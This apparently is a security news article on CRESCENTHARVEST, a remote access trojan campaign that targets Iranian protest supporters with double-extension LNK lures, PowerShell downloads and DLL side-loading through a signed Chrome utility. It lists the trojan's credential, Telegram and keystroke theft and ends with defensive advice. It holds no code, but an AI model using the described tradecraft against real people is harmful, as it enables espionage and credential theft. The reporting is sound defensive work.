CRESCENTHARVEST RAT Targets Iranian Protest Supporters

Security researchers have uncovered a fresh espionage campaign targeting Iranian protest supporters through malicious LNK files disguised as protest-related media. The operation, tracked as CRESCENTHARVEST, deploys a remote access trojan capable of browser credential theft, Telegram session hijacking, and keystroke logging.

The campaign appears designed to target journalists, activists, researchers, and diaspora communities seeking information about ongoing protests in Iran, according to analysis published by The Hacker News.

Not the First Time

This marks the second major campaign targeting Iranian protest documenters in recent months. We covered the RedKitten/SloppyMIO operation in late January, which used fabricated casualty lists as lures. CRESCENTHARVEST takes a different approach but shares the same strategic objective: compromising individuals who document or support protest activities.

Both campaigns exploit the natural urgency around protest documentation. People involved in human rights work will open files that appear to contain evidence of abuses—exactly what these threat actors count on.

Attack Chain

The infection begins with password-protected archives containing malicious .LNK files disguised with double extensions like "protest_video.mp4.lnk" or "victim_photos.jpg.lnk". The archives bundle legitimate protest media alongside the weaponized shortcuts, making the package appear authentic.

When a victim clicks the LNK file, PowerShell code executes and retrieves additional archives from attacker-controlled infrastructure. The final payload arrives via DLL side-loading—the attackers abuse a legitimate Google-signed Chrome cleanup utility (software_reporter_tool.exe) to load their malicious DLLs.

This technique mirrors what we've seen in other supply chain compromises targeting developer tools. Legitimate signed binaries provide cover for malicious payloads, complicating both automated detection and manual analysis.

Payload Capabilities

The CRESCENTHARVEST RAT operates through two primary DLL components:

urtcbased140d_d.dll extracts and decrypts Chrome's app-bound encryption keys, enabling theft of browser-stored credentials. The component shares code with ChromElevator, a known credential-harvesting tool.

version.dll serves as the main implant, collecting:

• Installed antivirus products
• User account information
• Browser history and saved credentials
• Telegram session data
• Keystroke logs

The RAT supports an extensive command set including directory enumeration, file uploads, PowerShell execution, cookie harvesting, and shell access. Telegram session theft is particularly concerning—access to messaging history and contacts provides intelligence on the victim's network and activities.

C2 Infrastructure

Command-and-control communications route through servicelog-information[.]com. The domain appears purpose-built for this campaign, with no observed connections to previously attributed infrastructure.

The campaign's timing aligns with nationwide Iranian protests that began in late 2025 and continued into 2026. Researchers observed activity picking up after January 9, 2026, following a fresh wave of demonstrations.

Attribution

No firm attribution has been established, though the campaign reflects tradecraft consistent with Iranian state-sponsored groups like Charming Kitten and Tortoiseshell. The targeting profile—diaspora communities, journalists, activists—matches known priorities of Iranian intelligence services.

The use of Telegram for data collection also fits regional patterns. Despite government blocking attempts, Telegram remains widely used by Iranian citizens and opposition groups. Compromising Telegram sessions provides direct visibility into activist communications and organizing efforts.

Operational Security Concerns

For individuals working on Iranian human rights issues, this campaign underscores operational security fundamentals:

1. Treat protest documentation with suspicion - files claiming to contain casualty information or protest evidence are prime lure material
2. Verify file extensions carefully - double extensions like .mp4.lnk indicate weaponized shortcuts
3. Use sandboxed environments - open untrusted files in isolated systems
4. Monitor Telegram sessions - review active sessions and terminate unrecognized devices
5. Separate work from personal systems - compartmentalization limits exposure when compromise occurs

For organizations tracking similar threats, the INFY/Tornado campaign analysis provides additional context on Iranian threat actor evolution.

Why This Matters

CRESCENTHARVEST demonstrates continued investment in targeting civil society. The technical sophistication isn't exceptional—DLL side-loading and credential theft are well-established techniques. But the social engineering shows careful attention to what will compel targets to open files.

Anyone documenting human rights situations should assume they're a target. The same urgency that drives activists to act on new information is precisely what these campaigns exploit. Verification before opening, isolation when possible, and paranoia as default posture remain the best defenses against operations designed to turn empathy into vulnerability.